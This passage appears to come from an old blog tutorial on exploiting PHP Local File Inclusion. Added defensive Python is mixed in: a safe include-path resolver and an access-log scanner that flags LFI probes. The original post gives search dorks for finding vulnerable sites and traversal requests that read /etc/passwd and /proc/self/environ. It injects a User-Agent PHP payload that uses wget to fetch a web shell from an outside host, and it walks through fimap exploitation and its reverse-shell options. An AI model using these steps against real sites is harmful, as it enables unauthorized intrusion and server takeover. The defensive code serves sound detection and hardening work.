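constructed for this example.
"""
import os
import tempfile
from typing import Dict, Optional


def resolve_include(base_dir: str, requested: str, allowed_ext: str = ".php") -> Optional[str]:
    """Return the file to include, or None if the request must be refused."""
    # PHP decodes %00 into a NUL byte; a NUL or empty value is never a page name.
    if not requested or "\0" in requested:
        return None
    real_base = os.path.realpath(base_dir)
    # join() drops the base when `requested` is absolute (e.g. /proc/self/environ),
    # and realpath() collapses ../ and follows symlinks, so the containment test
    # below is made on the file that would actually be opened.
    candidate = os.path.realpath(os.path.join(real_base, requested))
    try:
        inside = os.path.commonpath([real_base, candidate]) == real_base
    except ValueError:  # different drives on Windows: certainly not inside
        inside = False
    if not inside or candidate == real_base:
        return None
    if not candidate.endswith(allowed_ext) or not os.path.isfile(candidate):
        return None
    return candidate


def demo() -> Dict[str, bool]:
    """Probe a constructed pages/ tree; True means the request would be included."""
    with tempfile.TemporaryDirectory() as root:
        pages = os.path.join(root, "pages")
        os.mkdir(pages)
        with open(os.path.join(pages, "contact.php"), "w", encoding="utf-8") as fh:
            fh.write("<?php echo 'contact'; ?>\n")
        # Constructed stand-in for /etc/passwd, one directory above pages/.
        secret = os.path.join(root, "secret.txt")
        with open(secret, "w", encoding="utf-8") as fh:
            fh.write("root:x:0:0::/root:/bin/sh\n")
        probes = [
            "contact.php",              # legitimate page
            "../secret.txt",            # one level up, like ../etc/passwd in the post
            "../../../../etc/passwd",   # deeper traversal
            "/proc/self/environ",       # absolute path replaces the base directory
            "contact.php\0.jpg",        # NUL truncation attempt
            ".",                        # the base directory itself
        ]
        try:
            # A symlink inside pages/ that points outside; realpath() exposes it.
            os.symlink(secret, os.path.join(pages, "link.php"))
            probes.append("link.php")
        except OSError:
            pass  # symlinks unavailable on this platform; skip that probe
        return {probe: resolve_include(pages, probe) is not None for probe in probes}


if __name__ == "__main__":
    for probe, accepted in demo().items():
        print(f"{'ACCEPT' if accepted else 'REFUSE'}  {probe!r}")
```

<div class="MsoNormal" style="text-align: justify;">
<span style="color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Only "contact.php" is accepted; every traversal, absolute-path, NUL and symlink probe is refused. Where the set of pages is fixed, an allowlist keyed by page name is simpler still and removes the path from the request entirely.</span></div>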
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">To find LFI-vulnerable sites, use a dork like: inurl:php?id=*.php</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">The "*.php" means any file name with the
extension .php.</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Ex: inurl:php?page=contact.php, contactus.php etc.
</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Or inurl:.php?file=somefile.php<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">(* I'm not responsible for any of the actions
you take; this is for educational purposes only)</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">There are
two ways: manual and automated.</span></b></span><br />
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 12pt; line-height: 115%;">MANUAL
way for LFI:<o:p></o:p></span></u></b></span></div>
<h1 style="text-indent: .5in;">
<span class="threadtitle"><u><span style="font-size: 11pt;">proc/self/environ method:<o:p></o:p></span></u></span></h1>
<h1 style="text-indent: .5in;">
<span class="threadtitle"><span style="font-size: 11pt;"> <span class="Apple-style-span" style="font-weight: normal;">Check for a vulnerable site as described above,</span></span></span></h1>
<h1 style="text-indent: .5in;">
<span style="font-size: 11pt;"><span class="Apple-style-span" style="font-weight: normal;">then:</span><o:p></o:p></span></h1>
<h1 style="text-indent: .5in;">
<span style="font-family: Arial, sans-serif; font-size: 11pt;">Now let's check for /etc/passwd to
see if the page is vulnerable to Local File Inclusion. Let's make a request:<br />
</span><span style="font-size: 11pt;"><br />
</span><span style="font-size: 11pt;">http://www.website.com/view.php?page=../etc/passwd</span><span style="font-size: 11pt;"><br />
<br /><span class="Apple-style-span" style="font-weight: normal;">
We got an error and no /etc/passwd content.</span></span></h1>
<h1>
<span style="font-family: Arial, sans-serif; font-size: 11pt;">So we go one more directory up:<br />
<br />
</span><span style="font-family: Arial, sans-serif; font-size: 11pt;">http://www.website.com/view.php?page=../../etc/passwd<o:p></o:p></span></h1>
<h1>
<span style="font-family: Arial, sans-serif; font-size: 11pt;"><span class="Apple-style-span" style="font-weight: normal;">If you get like:</span><o:p></o:p></span></h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgakAFxZ3jWC2aFRbdSynnozY7b1aRI0uhHk2v0GQo0lEKVXydM_Ti9l7mSa44RhKUBc1xSb666TpVjhlBokY7KQzvENhjlbjkeHUDacrwbHWL0rtQMpALjT70kTtnJmvewd1BqaCj5plA/s1600/11.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgakAFxZ3jWC2aFRbdSynnozY7b1aRI0uhHk2v0GQo0lEKVXydM_Ti9l7mSa44RhKUBc1xSb666TpVjhlBokY7KQzvENhjlbjkeHUDacrwbHWL0rtQMpALjT70kTtnJmvewd1BqaCj5plA/s640/11.JPG" width="640" /></a></div>
<h1>
<span style="font-size: 11pt;"><span class="Apple-style-span" style="font-family: Arial, sans-serif;"><br /></span>
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-weight: normal;">We successfully included the /etc/passwd file.</span></span></h1>
<h1>
<span style="font-family: Arial, sans-serif; font-size: 11pt;"><span class="Apple-style-span" style="font-weight: normal;">Then check for /proc/self/environ (in place of
/etc/passwd); we get a message like:</span></span></h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqShUempyMmVBEovkCakp_g08BVX3OS6gYTB4k4qvA8L6Z3cvsBdCfokfkNfB7pVED06xBeYQTbRknnn6jX5VrcdJIpvgMHYT7Hf4fzeJWtTJAC2WFV9Un_Vj2pIotrMLaNSHMvzSGbi0/s1600/12.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqShUempyMmVBEovkCakp_g08BVX3OS6gYTB4k4qvA8L6Z3cvsBdCfokfkNfB7pVED06xBeYQTbRknnn6jX5VrcdJIpvgMHYT7Hf4fzeJWtTJAC2WFV9Un_Vj2pIotrMLaNSHMvzSGbi0/s640/12.JPG" width="640" /></a></div>
<h1>
<span class="Apple-style-span" style="font-weight: normal;"><span style="font-family: Arial, sans-serif; font-size: 11pt;">Then we need the Tamper Data add-on for Firefox:</span></span></h1>
<h1>
<span style="font-family: Arial, sans-serif; font-size: 11pt;"><span class="Apple-style-span" style="font-weight: normal;">Choose Tamper and in the User-Agent field write
the following code:</span><br />
<br />
</span><span style="font-family: Arial, sans-serif; font-size: 11pt;"><?system('wget
http://site.com/shel.txt -O shel.php');?></span><span style="font-family: Arial, sans-serif; font-size: 11pt;"><br />
<br /><span class="Apple-style-span" style="font-weight: normal;">
Then submit the request.</span><o:p></o:p></span></h1>
<h1>
<span style="font-family: Arial, sans-serif; font-size: 11pt;">(here shel.txt must contain the shell code,
which is fetched from another site with the wget command)</span></h1>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif;">Tada! Shell uploaded.</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Warning:
</span></u></b></span><span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 12pt; line-height: 115%;">I am not responsible for your actions; please be
careful. This is for educational purposes only.</span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 13pt; line-height: 115%;">--------------------------------------------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 13pt; line-height: 115%;"><b><br /></b></span></u></span>
<span class="apple-style-span"><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 13pt; line-height: 115%;"><b>Automated:<o:p></o:p></b></span></u></span><br />
<span class="apple-style-span"><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 13pt; line-height: 115%;"><b><br /></b></span></u></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now remove the file name in the URL and replace it
with "../" (without quotes).</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">If you get an error like:</span></span><br />
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;">Warning</span></b></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;">:
include_once(../) [<a href="http://www.thylacinecycles.com/function.include-once"><span style="color: #ff9900; font-family: Arial, sans-serif;">function.include-once</span></a>]:
failed to open stream: Inappropriate ioctl for device in</span></span><span class="apple-converted-space"><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;"> </span></span><span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;">/home/sitname
/public_html/index.php</span></b></span><span class="apple-converted-space"><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;">on line</span></span><span class="apple-converted-space"><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;"> </span></span><span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;">10</span></b></span><span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;"><br />
<br />
<span class="apple-style-span"><b>Warning</b>: include_once() [<a href="http://www.thylacinecycles.com/function.include"><span style="color: #ff9900; font-family: Arial, sans-serif;">function.include</span></a>]: Failed
opening '../' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php')
in<b>/home/sitename/public_html/index.php</b></span><span class="apple-converted-space"> </span><span class="apple-style-span">on line</span><span class="apple-converted-space"> </span><span class="apple-style-span"><b>10<o:p></o:p></b></span></span><br />
<span style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: #eeeeee; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; line-height: 115%;"><span class="apple-style-span"><b><br /></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">then the page is vulnerable to LFI.</span></span></div>
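<div class="MsoNormal" style="text-align: justify;">
<span style="color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Both the manual probes above and the "../" check leave traces on the server side: the traversal sequence and the file names /etc/passwd and /proc/self/environ appear in the request path of the access log, and a PHP open tag shows up in the User-Agent header when someone expects that header to be included through /proc/self/environ. The scanner below is an added example for the defender's side, not code from the original post. It parses combined-format access log lines, percent-decodes the request path (so ..%2F is seen as ../) and flags those indicators per source address. The log lines, the IP addresses (RFC 5737 documentation ranges), the log-format regex and the indicator list are all constructed for this example.</span></div>

```python
"""Flag LFI probing in web-server access logs.

Added example, not code from the original post. Log lines, addresses and the
indicator list are constructed for this example.
"""
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote

# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

TRAVERSAL = re.compile(r"\.\./|\.\.\\")                 # ../ or ..\ after decoding
PROBE_FILES = ("/etc/passwd", "/proc/self/environ")     # the two files the post probes with
PHP_OPEN_TAG = re.compile(r"<\?")                       # PHP code has no business in a User-Agent

# Constructed sample lines, not from any real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Oct/2011:11:35:00 -0700] "GET /view.php?page=contact.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Oct/2011:11:35:02 -0700] "GET /view.php?page=../etc/passwd HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Oct/2011:11:35:03 -0700] "GET /view.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1844 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Oct/2011:11:35:05 -0700] "GET /view.php?page=../../proc/self/environ HTTP/1.1" 200 2210 "-" "<?php echo 1; ?>"',
    '203.0.113.4 - - [18/Oct/2011:11:35:09 -0700] "GET /index.php?page=../ HTTP/1.1" 200 940 "-" "curl/7.21.0"',
]


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (%252e%252e%252f -> ../)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def classify(path: str, user_agent: str) -> List[str]:
    """Return the list of LFI indicators present in one request, empty if none."""
    reasons: List[str] = []
    decoded_path = fully_decode(path)
    if TRAVERSAL.search(decoded_path):
        reasons.append("traversal")
    reasons.extend(name for name in PROBE_FILES if name in decoded_path)
    if PHP_OPEN_TAG.search(fully_decode(user_agent)):
        reasons.append("php-in-user-agent")
    return reasons


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """Parse combined-format lines and keep those carrying at least one indicator."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not in combined format; a real deployment would count these
        reasons = classify(match["path"], match["ua"])
        if reasons:
            findings.append({"ip": match["ip"], "path": match["path"],
                             "status": match["status"], "reasons": reasons})
    return findings


def count_by_ip(findings: List[Dict[str, object]]) -> Dict[str, int]:
    """Number of flagged requests per source address, for triage ordering."""
    return dict(Counter(str(f["ip"]) for f in findings))


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for hit in hits:
        print(f"{hit['ip']:<14} {hit['status']} {', '.join(hit['reasons']):<42} {hit['path']}")
    print(count_by_ip(hits))
```

<div class="MsoNormal" style="text-align: justify;">
<span style="color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">On the sample, the four requests from 198.51.100.7 and 203.0.113.4 are flagged and the ordinary page view is not. The status code is kept in each finding because a 200 on a traversal request, as in the screenshots above, is the case that needs immediate attention, while a 404 or 500 only tells you someone is probing.</span></div>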
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now to
attack :<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">You need a Python script called fimap, which
can be found via Google.</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">You need Python installed to run it.</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Open a command prompt, go to the folder where the fimap.py
script is, and type:</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><b>fimap.py -u www.site.com/file.php?page=file.php</b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">(<b>-u: scan the given URL to check whether the vulnerability exists</b>)</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><b><br /></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">It tests whether a file can be injected where the page is
vulnerable; the output looks like this:</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXMAlVYCZ3OlLH-6fwjX_uVmvUWmcOY3qw34p1EhyphenhyphenUSojC097hMng4Ui5dbdOhD1KFPIcCqM_BUs6Gcfu7w6uZCmeau8WHBkyZtyjZzAtCWL4qCRkwPdVt4n4qxhQwFZGZN6jDRIjSDa0/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXMAlVYCZ3OlLH-6fwjX_uVmvUWmcOY3qw34p1EhyphenhyphenUSojC097hMng4Ui5dbdOhD1KFPIcCqM_BUs6Gcfu7w6uZCmeau8WHBkyZtyjZzAtCWL4qCRkwPdVt4n4qxhQwFZGZN6jDRIjSDa0/s640/1.JPG" width="640" /></a></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">In the screenshot above you can see at the bottom:
"[1] /proc/self/environ"</span></span></div>
<div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -.25in;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">0 (0 = clean/readable,
1 = writable)</span></span></div>
<div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -.25in;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now to exploit, type:</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><b>fimap.py -x www.site.com/file.php?page=file.php</b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><b><br /></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">(-x: exploit; -u: scan for the vulnerability).</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now you will find like this :<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1l0LNn8Y1N4IYYvIIfu1Y4eyPOjeTE8hFebkE8Cf5gFE15Aljui_TLSEfB8J06kMxKHkL56M1FBwZXfzBB-AfixBLqr3312Nj9hilanq5uej7JVIA7bU9irGTfb7gvZPr8YoO4XZYEFM/s1600/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1l0LNn8Y1N4IYYvIIfu1Y4eyPOjeTE8hFebkE8Cf5gFE15Aljui_TLSEfB8J06kMxKHkL56M1FBwZXfzBB-AfixBLqr3312Nj9hilanq5uej7JVIA7bU9irGTfb7gvZPr8YoO4XZYEFM/s640/2.JPG" width="640" /></a></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Choose a domain. Here you need to choose a
number; my option is "9". fimap stores the history of successful exploitation,
so choose the number corresponding to the domain you have scanned.</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">After that it asks for options again, this time to choose the vulnerable script (choose its number; if there is only one script, type 1).<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Then it asks again for the type of attack; the available ones are:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">1.spawn fimap shell<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">2.pentest monkey reverse shell<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Select option 1.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
